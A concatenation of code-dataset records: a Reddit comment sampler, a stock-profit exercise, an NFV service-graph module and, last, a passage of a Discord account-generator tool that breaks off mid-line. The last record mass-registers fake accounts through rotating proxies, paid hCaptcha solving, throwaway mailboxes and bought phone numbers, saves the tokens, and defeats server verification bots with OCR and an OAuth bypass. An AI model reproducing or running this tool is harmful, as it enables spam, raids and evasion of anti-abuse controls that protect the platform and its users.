sample_percent):\n\tsample_data_file = open((str(collection) + \".csv\"), 'w')\n\tprint(\"starting to get sample data from '\" + str(collection) + \"' with sample size '\" + str(sample_percent) + \"' and writing to '\" + str(sample_data_file) + \"'\")\n\tlink_cursor = collection.find({}, {\"link_id\": True})\n\n\tsample_size = int(link_cursor.count() * sample_percent/100)\n\tsample_data_dict = {}\n\tlink_id_dict = {}\n\n\tfor link_id in link_cursor:\n\t\tif len(link_id_dict) >= sample_size:\n\t\t\tbreak\n\t\telse:\n\t\t\tlink_id_dict[link_id['link_id']] = 1\n\n\tcounter = 0\n\tdict_size = len(link_id_dict)\n\tpercent_done = 0\n\tkeys_done = 0\n\tnum_of_fails = 0\n\n\tsample_data_file = open(\"test123.csv\", 'wb')\n\n\twith sample_data_file:\n\t\tfor key in link_id_dict.keys():\n\t\t\tcursor = collection.find({'link_id': key})\n\t\t\tkeys_done += 1\n\t\t\tif (keys_done % int(dict_size / 20)) == 1:\n\t\t\t\tprint(percent_done)\n\t\t\t\tpercent_done += 5\n\n\t\t\tif cursor.count() <= 1:\n\t\t\t\tcounter += 1\n\n\t\t\tfor doc in cursor:\n\t\t\t\tcurr = \"\" + str(doc['_id']) + \",\" + str(doc['archived']) + \",\" + str(doc['author']) + \",\" + str(\n\t\t\t\t\tdoc['author_flair_css_class']) + \",\" + str(doc['author_flair_text']) + \",\" + str(\n\t\t\t\t\tdoc['body']) + \",\" + str(doc['controversiality']) + \",\" + str(doc['created_utc']) + \",\" + str(\n\t\t\t\t\tdoc['distinguished']) + \",\" + str(doc['downs']) + \",\" + str(doc['edited']) + \",\" + str(\n\t\t\t\t\tdoc['gilded']) + \",\" + str(doc['id']) + \",\" + str(doc['link_id']) + \",\" + str(doc['name']) + \",\" + str(\n\t\t\t\t\tdoc['parent_id']) + \",\" + str(doc['retrieved_on']) + \",\" + str(doc['score']) + \",\" + str(\n\t\t\t\t\tdoc['score_hidden']) + \",\" + str(doc['subreddit']) + \",\" + str(doc['subreddit_id']) + \",\" + str(\n\t\t\t\t\tdoc['ups']) + \"\\n\"\n\n\t\t\t\tsample_data_file.write(curr.encode(\"utf-8\"))\n\n\n\tprint(\"counter: \", counter)\n\tprint(\"collectionsize: \", link_cursor.count())\n\tprint(\"samplesize: \", sample_size)\n\tprint(\"num of fails: \", num_of_fails)\n\n\toutput_file_one_or_less.write(str(collection) + \",\" + str(link_cursor.count()) + \",\" + str(sample_size) + \",\" + str(counter) + \"\\n\")\n\tsample_data_file.close()\n\n\nget_sample_data(db.comments_2008, 0.1)\ntime_end = datetime.datetime.now()\nelapsed_time = time_end - time_start\ntiming()\n\n# get_sample_data(db.comments_2009, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n#\n# get_sample_data(db.comments_2010, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n#\n# get_sample_data(db.comments_2011, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n#\n# get_sample_data(db.comments_2012, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n#\n# get_sample_data(db.comments_2013, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n#\n# get_sample_data(db.comments_2014, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n\noutput_file_one_or_less.close()\n","sub_path":"Scripts/testing/analyze_sample_data.py","file_name":"analyze_sample_data.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"501195341","text":"data = list()\nwith open('sampleData4/3.inp', 'r') as f:\n data = [int(x) for x in f.readlines()]\ndata = data[1:]\n\ndef bp(data):\n _buy = 0\n buy = 0\n sell = 0\n best = 0\n for time in range(1, len(data)):\n _best = data[time] - data[_buy]\n if _best > best:\n best = _best\n buy = _buy\n sell = time\n elif _best == best and _buy != buy and _buy > buy:\n buy = _buy\n sell = time\n elif _best <= 0:\n _buy = time\n\n return buy, sell\n\nbuy, sell = bp(data)\nprint(buy+1, sell+1)\n","sub_path":"과제/4주차과제/소스/allin_test4.py","file_name":"allin_test4.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"440553599","text":"'''\nCreated on May 14, 2015\n\n@author: fabiomignini\n'''\nimport json\nimport logging\nimport time\n\nimport requests\nfrom requests.exceptions import Timeout\n\nfrom webContent.constants import *\nfrom exception import Unauthorized\nfrom slapp import instantiate, delete\n\n\ntimeout_after_instantiation = 20\nglobal_match_id = 0\ndefault_priority = \"10\"\ningress_endpoint = 'user_ingress'\negress_endpoint = 'user_egress'\ningress_port_id = \"User:0\"\negress_port_id = \"WAN:0\"\nswitch_ingress_port = \"L2Port:0\"\nswitch_egress_port = \"L2Port:1\"\n\nclass Node(object):\n def __init__(self, node_type, node_id, port_id=None):\n self.node_type = node_type\n self.node_id = node_id\n self.port_id = port_id\n \n def isVNF(self):\n if self.node_type == 'vnf':\n return True\n return False\n \n def isLAN(self):\n if self.node_type == 'lan':\n return True\n return False\n \n def isTrafficSplitter(self):\n if self.node_type == 'splittermerger':\n return True\n return False\n \n def isEndpoint(self):\n if self.node_type == 'endpoint':\n return True\n return False\n \n def setAsVNF(self):\n self.node_type = 'vnf'\n\n\n\ndef setFlowruleFromEndpoint(endpoint_id, match_id, vnf, port, priority=None):\n flowrule = {}\n flowrule['action'] = {}\n flowrule['action']['VNF'] = {}\n flowrule['action']['VNF']['id'] = vnf\n flowrule['action']['VNF']['port'] = port\n flowrule['action']['type'] = \"output\"\n flowrule['flowspec'] = {}\n flowrule['flowspec']['matches'] = []\n match = {}\n if priority is None:\n match['priority'] = default_priority\n else:\n match['priority'] = priority\n match['id'] = match_id\n flowrule['flowspec']['matches'].append(match)\n flowrule['flowspec']['ingress_endpoint'] = endpoint_id\n return flowrule\n\ndef setFlowruleToEndpoint(endpoint_id, match_id, priority=None):\n flowrule = {}\n flowrule['action'] = {}\n flowrule['action']['endpoint'] = {}\n flowrule['action']['endpoint']['id'] = endpoint_id\n flowrule['action']['type'] = \"output\"\n flowrule['flowspec'] = {}\n flowrule['flowspec']['matches'] = []\n match = {}\n if priority is None:\n match['priority'] = default_priority\n else:\n match['priority'] = priority\n match['id'] = match_id\n flowrule['flowspec']['matches'].append(match)\n return flowrule\n\ndef setFlowruleToVNF(output_vnf, output_port, match_id, flowspec=None):\n flowrule = {}\n flowrule['action'] = {}\n flowrule['action']['VNF'] = {}\n flowrule['action']['VNF']['id'] = output_vnf\n flowrule['action']['VNF']['port'] = output_port\n flowrule['action']['type'] = \"output\"\n flowrule['flowspec'] = {}\n flowrule['flowspec']['matches'] = []\n match = {}\n \n match['priority'] = default_priority\n \n match['id'] = match_id\n flowrule['flowspec']['matches'].append(match)\n return flowrule\n \ndef createFlowrule(node_a, node_b, vnf_id, port_id, outgoing_flowrules_obj, ingoing_flowrules_obj):\n # Warning: in the NFFG in use, can't be directly connected two end-points\n global global_match_id\n if node_a.isVNF() and node_a.node_id == vnf_id and node_a.port_id == port_id:\n if node_b.isVNF():\n # TODO: match id\n outgoing_flowrules_obj.append(setFlowruleToVNF(node_b.node_id, str(node_b.port_id), str(global_match_id)))\n global_match_id = global_match_id + 1\n if node_b.isEndpoint():\n # TODO: match id\n outgoing_flowrules_obj.append(setFlowruleToEndpoint(node_b.node_id, str(global_match_id)))\n global_match_id = global_match_id + 1\n ingoing_flowrules_obj.append(setFlowruleFromEndpoint(node_b.node_id, str(global_match_id), node_a.node_id, str(node_a.port_id)))\n global_match_id = global_match_id + 1\n \ndef createGraph(vnf_list, user_id, encode=True): \n # TODO: if no one vnfs in list, I should add a switch default vm\n nffg = {}\n nffg['profile'] = {}\n nffg['profile']['id'] = user_id\n nffg['profile']['name'] = user_id\n vnfs = []\n for index, vnf in enumerate(vnf_list):\n if vnf['psa_id'] == \"switch\":\n _ingress_port_id = switch_ingress_port\n _egress_port_id = switch_egress_port\n else:\n _ingress_port_id = ingress_port_id\n _egress_port_id = egress_port_id\n \n vnf_obj = {}\n vnf_obj['vnf_descriptor'] = vnf['psa_id'] + '.json'\n vnf_obj['id'] = vnf['psa_id']\n vnf_obj['name'] = vnf['psa_id']\n vnf_obj['ports'] = []\n if index == 0:\n port_obj = {}\n port_obj['id'] = _ingress_port_id\n outgoing_flowrules_obj = []\n ingoing_flowrules_obj = []\n node1 = Node('endpoint', ingress_endpoint)\n node2 = Node('vnf', vnf['psa_id'], _ingress_port_id)\n else:\n port_obj = {}\n port_obj['id'] = _ingress_port_id\n outgoing_flowrules_obj = []\n ingoing_flowrules_obj = []\n node1 = Node('vnf', vnf_list[index - 1]['psa_id'], _egress_port_id)\n node2 = Node('vnf', vnf['psa_id'], _ingress_port_id)\n \n createFlowrule(node1, node2, vnf['psa_id'], _ingress_port_id, outgoing_flowrules_obj, ingoing_flowrules_obj)\n createFlowrule(node2, node1, vnf['psa_id'], _ingress_port_id, outgoing_flowrules_obj, ingoing_flowrules_obj)\n if len(outgoing_flowrules_obj) != 0:\n port_obj['outgoing_label'] = {}\n port_obj['outgoing_label']['flowrules'] = outgoing_flowrules_obj\n if len(ingoing_flowrules_obj) != 0:\n port_obj['ingoing_label'] = {}\n port_obj['ingoing_label']['flowrules'] = ingoing_flowrules_obj\n vnf_obj['ports'].append(port_obj)\n \n if index == (len(vnf_list) - 1):\n port_obj = {}\n port_obj['id'] = _egress_port_id\n outgoing_flowrules_obj = []\n ingoing_flowrules_obj = []\n node1 = Node('vnf', vnf['psa_id'], _egress_port_id)\n node2 = Node('endpoint', egress_endpoint)\n else:\n port_obj = {}\n port_obj['id'] = _egress_port_id\n outgoing_flowrules_obj = []\n ingoing_flowrules_obj = []\n node1 = Node('vnf', vnf['psa_id'], _egress_port_id)\n node2 = Node('vnf', vnf_list[index + 1]['psa_id'], _ingress_port_id)\n \n createFlowrule(node1, node2, vnf['psa_id'], _egress_port_id, outgoing_flowrules_obj, ingoing_flowrules_obj)\n createFlowrule(node2, node1, vnf['psa_id'], _egress_port_id, outgoing_flowrules_obj, ingoing_flowrules_obj) \n if len(outgoing_flowrules_obj) != 0:\n port_obj['outgoing_label'] = {}\n port_obj['outgoing_label']['flowrules'] = outgoing_flowrules_obj\n if len(ingoing_flowrules_obj) != 0:\n port_obj['ingoing_label'] = {}\n port_obj['ingoing_label']['flowrules'] = ingoing_flowrules_obj\n vnf_obj['ports'].append(port_obj)\n \n vnfs.append(vnf_obj)\n nffg['profile']['VNFs'] = vnfs\n endpoints = []\n \n # End points\n endpoint_obj = {}\n endpoint_obj['id'] = ingress_endpoint\n endpoint_obj['name'] = 'INGRESS'\n endpoints.append(endpoint_obj)\n endpoint_obj = {}\n endpoint_obj['id'] = egress_endpoint\n endpoint_obj['name'] = 'EGRESS'\n endpoints.append(endpoint_obj)\n \n nffg['profile']['endpoints'] = endpoints\n if encode:\n return json.dumps(nffg, sort_keys=True).encode()\n else:\n return nffg\n\ndef putServiceGraphInKeystone(token, user_id, graph):\n data = json.dumps(graph)\n headers = {'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Auth-Token': token}\n resp = requests.post(URL_SERVICE_GRAPH + user_id, headers=headers, data=data, timeout=TIMEOUT)\n if resp.status_code == 401:\n logging.error(\"Keystone returns 401 unauthorized\")\n raise Unauthorized('Keystone returns 401 Unauthorized')\n resp.raise_for_status()\n return resp.text\n\ndef waitInstantiation(token=None):\n try:\n while True:\n headers = {'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Auth-Token': token}\n resp = requests.get(SERVICE_LAYER, headers=headers, timeout=(TIMEOUT))\n if resp.status_code == 201:\n break\n elif resp.status_code == 202:\n continue\n elif resp.status_code == 401:\n logging.error(\"Orchestrator returns 401 unauthorized\")\n raise Unauthorized('Orchestrator returns 401 Unauthorized')\n else:\n logging.error('Orchestrator returns ' + resp.status_code)\n raise\n except Timeout as err:\n logging.error(\"Orchestrator request timeout\")\n raise err\n \ndef saveAndInstantiateServiceGraph(session, vnfs):\n '''\n Crate a Service graph for a user, and trigger the instantiation of it in the SLApp\n '''\n \n # Create a list of selected app\n active_vnfs = []\n for vnf in vnfs['list']:\n if vnf['checked'] == 1:\n active_vnfs.append(vnf)\n \n \n if len(active_vnfs) == 0:\n psa = {}\n psa['psa_name'] = \"switch\"\n psa['psa_id'] = \"switch\"\n active_vnfs.append(psa)\n \n graph = createGraph(active_vnfs, vnfs['user'], False)\n \n # Put the service graph in keystone\n putServiceGraphInKeystone(session['token'], session['user_id'], graph) \n \n instantiate(session['token'])\n waitInstantiation(session['token'])\n # delete(session['token'])\n logging.debug(\"Service graph instantiated\")\n time.sleep(timeout_after_instantiation)\n else:\n graph = createGraph(active_vnfs, vnfs['user'], False)\n \n # Put the service graph in keystone\n putServiceGraphInKeystone(session['token'], session['user_id'], graph) \n logging.debug(\"Service graph stored in keystone: \" + json.dumps(graph))\n \n # Call the service layer application to instantiate the user profile\n instantiate(session['token'])\n \n waitInstantiation(session['token'])\n \n logging.debug(\"Service graph instantiated\")\n time.sleep(timeout_after_instantiation)\n \n\n\n\n\n \n","sub_path":"webContent/modules/service_graph.py","file_name":"service_graph.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"217620835","text":"from requests import get, post, Session\r\nfrom random import randint, choice,randrange\r\nfrom re import findall, sub\r\nfrom websocket import WebSocket\r\nfrom string import ascii_lowercase, digits\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nfrom time import sleep\r\nfrom json import loads,dumps,load\r\nfrom flask import Flask, request\r\nfrom flask_cors import CORS\r\n#from os import system, name\r\n\r\n# load config\r\nconfig = load(open('config.json', encoding='utf-8'))\r\nproxy_list = open(config['proxy_file_name'], encoding='utf-8').readlines()\r\nproxy_num = 0\r\n# init flask\r\napp = Flask(__name__, static_url_path='/html')\r\nCORS(app)\r\ntoken_am = 0\r\nver_m = False\r\nver_p = False\r\nonline_tf = False\r\nonline_msg = \"czloed Dhub\"\r\nlivesteam_tf = False\r\nlivesteam_ch = None\r\nlivesteam_g = None\r\nrunn = False\r\n# init threadpool\r\nexecutor = ThreadPoolExecutor(max_workers=int(10000))\r\n\r\ndef headers(token=None, fingerprint=None, mail=False,xsu=None,useragent=None, referrer=\"https://discord.com/channels/@me\") :\r\n if token :\r\n if mail :\r\n return {'Content-Type': 'application/json','user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.122 Safari/537.36', 'authorization': \"Bearer \" + token}\r\n else :\r\n head = {'origin': 'https://discord.com', 'Accept': '*/*','Accept-Language': 'en-US', 'Content-Type': 'application/json','user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.1.7 Chrome/83.0.4103.122 Electron/9.4.4 Safari/537.36', 'authorization': token, 'x-super-properties': \"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjAuMS43Iiwib3NfdmVyc2lvbiI6IjEwLjAuMTgzNjMiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6ODgxODEsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9\"}\r\n if referrer :\r\n head[\"referrer\"] = referrer\r\n if useragent :\r\n head[\"user-agent\"] = useragent\r\n if xsu :\r\n head[\"x-super-properties\"] = xsu\r\n return head\r\n else :\r\n head = {'Content-Type': 'application/json','user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.122 Safari/537.36'}\r\n if mail : \r\n return head\r\n head['x-super-properties'] = 'eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkxLjAuNDQ3Mi4xMTQgU2FmYXJpLzUzNy4zNiBFZGcvOTEuMC44NjQuNTQiLCJicm93c2VyX3ZlcnNpb24iOiI5MS4wLjQ0NzIuMTE0Iiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjg4MTgxLCJjbGllbnRfZXZlbnRfc291cmNlIjpudWxsfQ=='\r\n if fingerprint :\r\n head['x-fingerprint'] = fingerprint\r\n return head\r\n \r\n#def clear():\r\n# system('cls' if name=='nt' else 'clear')\r\n\r\n\r\ndef asciigen(length):\r\n asc = ''\r\n for x in range(int(length)):\r\n num = randrange(13000)\r\n asc = asc + chr(num)\r\n return asc\r\n\r\ndef get_bal():\r\n return post('https://api.capmonster.cloud/getBalance',timeout=5,json={\"clientKey\": config['cap_key']}).json()['balance']\r\n\r\ndef randomstr(n):\r\n\treturn ''.join(choice(ascii_lowercase + digits) for _ in range(n))\r\n\r\ndef randomint(n):\r\n return str(randint(10**(n-1), (10**n)-1))\r\n\r\ndef get_fingerprint():\r\n return get(\"https://discord.com/api/v9/experiments\", headers=headers()).json()[\"fingerprint\"]\r\n\r\ndef sendmsg(msg, chid, guild_id, token):\r\n post(f\"https://discord.com/api/v9/channels/{chid}/messages\", json={\"content\":msg,\"nonce\":randomint(18),\"tts\":False}, headers=headers(token, referrer=f\"https://discord.com/channels/{guild_id}/{chid}\"))\r\n\r\ndef get_proxy():\r\n global proxy_num,proxy_list\r\n try :\r\n proxy = proxy_list[proxy_num]\r\n proxy_num+=1\r\n except:\r\n proxy = proxy_list[0]\r\n proxy_num=0\r\n return proxy.replace('\\n','')\r\n\r\n\r\ndef get_captcha_code():\r\n taskid = post('http://api.capmonster.cloud/createTask', json={\"clientKey\":config['cap_key'],\"task\":{\"type\":\"HCaptchaTaskProxyless\",\"websiteURL\":\"https://discord.com/register\",\"websiteKey\":\"f5561ba9-8f1e-40ca-9b5b-a0b3f719ef34\"}}).json()['taskId']\r\n sleep(1)\r\n while True:\r\n lest_res = post('http://api.capmonster.cloud/getTaskResult', json={\"clientKey\":config['cap_key'], 'taskId': taskid}).json()\r\n if lest_res['status'] == 'ready':\r\n return lest_res['solution']['gRecaptchaResponse']\r\n break\r\n sleep(2)\r\n\r\n# create zone\r\ndef token_gen(username,invite=config[\"invite_link\"], verify_mail=False, verify_phone=False, file_name=\"token\"):\r\n global token_am\r\n password = \"czloed_Dhub@\"\r\n register_payload = {\"fingerprint\":\"\",\"email\": randomstr(randint(3, 6)) + randomint(randint(3, 5)) + \"@gmail.com\",\"username\":username,\"password\": password,\"invite\":invite,\"consent\":True,\"date_of_birth\":\"1999-06-10\",\"gift_code_sku_id\":\"\",\"captcha_key\":\"\"}\r\n \r\n if verify_mail :\r\n mail_domain = get(\"https://api.mail.tm/domains\", headers=headers(mail=True)).json()[\"hydra:member\"][0][\"domain\"]\r\n mail = f\"{username}@{mail_domain}\"\r\n post(\"https://api.mail.tm/accounts\",json={\"address\":mail,\"password\":password}, headers=headers(mail=True))\r\n register_payload[\"email\"] = mail\r\n mail_token = post(\"https://api.mail.tm/token\",json={\"address\":mail,\"password\":password}, headers=headers(mail=True)).json()[\"token\"]\r\n #fingerprint = get_fingerprint()\r\n #register_payload[\"fingerprint\"] = fingerprint\r\n register_payload[\"captcha_key\"] = get_captcha_code()\r\n while True:\r\n proxy = {'https': f\"socks4://{get_proxy()}\"}\r\n try :\r\n textres = post(\"https://discord.com/api/v9/auth/register\", timeout=5,proxies=proxy, json=register_payload, headers=headers(referrer=\"https://discord.com/register\")).json()#, fingerprint=fingerprint\r\n discord_token = textres[\"token\"]\r\n print(\"[token gen] I Got token | \" + discord_token)\r\n a = open(f'{file_name}.txt', 'a')\r\n a = a.write(f\"{discord_token}\\n\")\r\n token_am += 1\r\n break\r\n except :\r\n try :\r\n print(\"[token gen] fail to gen token | \"+ textres)\r\n except:\r\n print(\"[token gen] fail to gen token | i thing proxy\")\r\n try:\r\n textres['captcha_key']\r\n break\r\n except:\r\n pass\r\n register_payload[\"email\"] = randomstr(randint(1, 6)) + randomint(randint(1, 5)) + \"@gmail.com\"\r\n \r\n \r\n if verify_mail :\r\n print(\"[mail] Waiting for mail...\")\r\n message=\"\"\r\n msg_id=\"\"\r\n while True :\r\n sleep(5)\r\n try :\r\n print(\"[mail] checking...\")\r\n message = get(\"https://api.mail.tm/messages\", headers=headers(mail_token, mail=True)).json()\r\n msg_id = message[\"hydra:member\"][0][\"id\"]\r\n print(\"[mail] I Got Mail\")\r\n break\r\n except :\r\n pass\r\n message = get(f\"https://api.mail.tm/messages/{msg_id}\", headers=headers(mail_token, mail=True)).json()[\"text\"]\r\n link = findall(r'(https?://\\S+)', message)[0]\r\n token_verify = get(link, headers=headers(discord_token)).url.partition(\"https://discord.com/verify#token=\")[2]\r\n \r\n verify_payload = {\"token\": token_verify, \"captcha_key\": get_captcha_code()}\r\n post(\"https://discord.com/api/v9/auth/verify\", headers=headers(discord_token, referrer=\"https://discord.com/verify\", fingerprint=fingerprint), json=verify_payload)\r\n print(\"[mail] Done\")\r\n \r\n if verify_phone :\r\n print(\"[token gen] wait for phone verify | \" + discord_token)\r\n sms_auth = {'Authorization':config['sms_key'],'Accept': 'application/json'}\r\n sms_res = get('https://5sim.net/v1/user/buy/activation/cambodia/any/discord',headers=sms_auth).json()\r\n sms_id = sms_res['id']\r\n sms_num = sms_res['phone']\r\n print(f\"[SMS] Got a number({sms_num})\")\r\n sleep(2.5)\r\n response = post('https://discord.com/api/v9/users/@me/phone', headers=headers(discord_token, fingerprint=fingerprint,useragent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54\",xsu=\"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkxLjAuNDQ3Mi4xMTQgU2FmYXJpLzUzNy4zNiBFZGcvOTEuMC44NjQuNTQiLCJicm93c2VyX3ZlcnNpb24iOiI5MS4wLjQ0NzIuMTE0Iiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiJodHRwczovL2dpdmVhd2F5Ym90LnBhcnR5LyIsInJlZmVycmluZ19kb21haW4iOiJnaXZlYXdheWJvdC5wYXJ0eSIsInJlZmVycmVyX2N1cnJlbnQiOiIiLCJyZWZlcnJpbmdfZG9tYWluX2N1cnJlbnQiOiIiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo4ODI5NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=\"), json={\"phone\": sms_num})\r\n if response.status_code != 204:\r\n print(response.json()['message'])\r\n return False\r\n print(\"[SMS] Waiting for code...\")\r\n sleep(2.5)\r\n maxAttempts = 30\r\n attempts = 0\r\n while 1:\r\n if attempts >= maxAttempts:\r\n break\r\n sleep(10)\r\n print(\"[SMS] checking...\")\r\n response = get(f'https://5sim.net/v1/user/check/{sms_id}',headers=sms_auth).json()\r\n attempts += 1\r\n if response['sms'] != None:\r\n break\r\n \r\n if attempts >= maxAttempts:\r\n get(f'https://5sim.net/v1/user/ban/{sms_id}',headers=sms_auth)\r\n return False\r\n code = response['sms'][0]['code']\r\n print(f\"[SMS] Found code: {str(code)}.\")\r\n lastResponse = post('https://discord.com/api/v9/users/@me/phone/verify', headers=headers(discord_token, fingerprint=fingerprint,useragent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54\",xsu=\"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkxLjAuNDQ3Mi4xMTQgU2FmYXJpLzUzNy4zNiBFZGcvOTEuMC44NjQuNTQiLCJicm93c2VyX3ZlcnNpb24iOiI5MS4wLjQ0NzIuMTE0Iiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiJodHRwczovL2dpdmVhd2F5Ym90LnBhcnR5LyIsInJlZmVycmluZ19kb21haW4iOiJnaXZlYXdheWJvdC5wYXJ0eSIsInJlZmVycmVyX2N1cnJlbnQiOiIiLCJyZWZlcnJpbmdfZG9tYWluX2N1cnJlbnQiOiIiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo4ODI5NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=\"), json={'code': code})\r\n if lastResponse.status_code == 204:\r\n get(f'https://5sim.net/v1/user/finish/{sms_id}',headers=sms_auth)\r\n print(\"[SMS] Done\")\r\n else:\r\n print(lastResponse.json()['message'])\r\n return False\r\n return discord_token\r\n \r\n#bypass zone\r\ndef bypass_aria(token, msg, chid, guild_id): # fix\r\n sendmsg(\"-ind\", chid, guild_id, token)\r\n for a in range(len(msg)): \r\n sleep(0.5)\r\n sendmsg(msg[a], chid, guild_id, token)\r\n sendmsg(\"Yes\", chid, guild_id, token)\r\n \r\ndef bypass_aria_verify(token, chid, guild_id): # fix\r\n from PIL import Image\r\n from pytesseract import pytesseract, image_to_string\r\n from io import BytesIO, StringIO\r\n from base64 import b64encode\r\n sendmsg(\"-verify\", chid, guild_id, token)\r\n sleep(5)\r\n pytesseract.tesseract_cmd = config['pytessereact']\r\n msgimg = get(f\"https://discord.com/api/v9/channels/{chid}/messages?limit=50\", headers=headers(token, referrer=f\"https://discord.com/channels/@me/{chid}\")).json()\r\n url = msgimg[0]['embeds'][0]['image']['url']\r\n imgraw = get(url, headers=headers(mail=True))\r\n base64_raw = b64encode(imgraw.content).decode(\"utf-8\")\r\n pic = StringIO()\r\n image_string = BytesIO(b64decode(base64_raw))\r\n image = Image.open(image_string)\r\n bg = Image.new(\"RGB\", image.size, (255,255,255))\r\n bg.paste(image,image)\r\n string = sub(r'\\W+', '', image_to_string(bg))\r\n sendmsg(string, chid, guild_id, token)\r\n\r\ndef bypass_server_cap(token, chid, guild_id): # fix\r\n from base64 import b64encode\r\n getchid = post(\"https://discord.com/api/v9/users/@me/channels\", json={\"recipients\":[\"512333785338216465\"]}, headers=headers(token)).json()\r\n msgimg = get(f\"https://discord.com/api/v9/channels/{getchid['id']}/messages?limit=50\", headers=headers(token, referrer=f\"https://discord.com/channels/@me/getchid['id']\")).json()\r\n print(msgimg[0]['embeds'][0]['image']['url'])\r\n imgraw = get(msgimg[0]['embeds'][0]['image']['url'], headers=headers())\r\n uri = (\"data:\" + imgraw.headers['Content-Type'] + \";\" + \"base64,\" + b64encode(imgraw.content).decode(\"utf-8\"))\r\n result = solver.normal(uri, hintText='same picture')\r\n print(result['code'])\r\n sendmsg(result['code'], chid, guild_id, token)\r\n return \"Done\"\r\n \r\n \r\ndef bypass_fortune_invite(token, invite): # fix \r\n from bs4 import BeautifulSoup\r\n session = Session()\r\n url = \"https://discord.com/api/v9/oauth2/authorize?client_id=618441438564188196&response_type=code&redirect_uri=https%3A%2F%2Fftune.app%2Flogin&scope=identify%20guilds%20guilds.join\"\r\n codeurl = session.post(url, json={\"permissions\":\"0\",\"authorize\":True}, headers=headers(token,useragent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 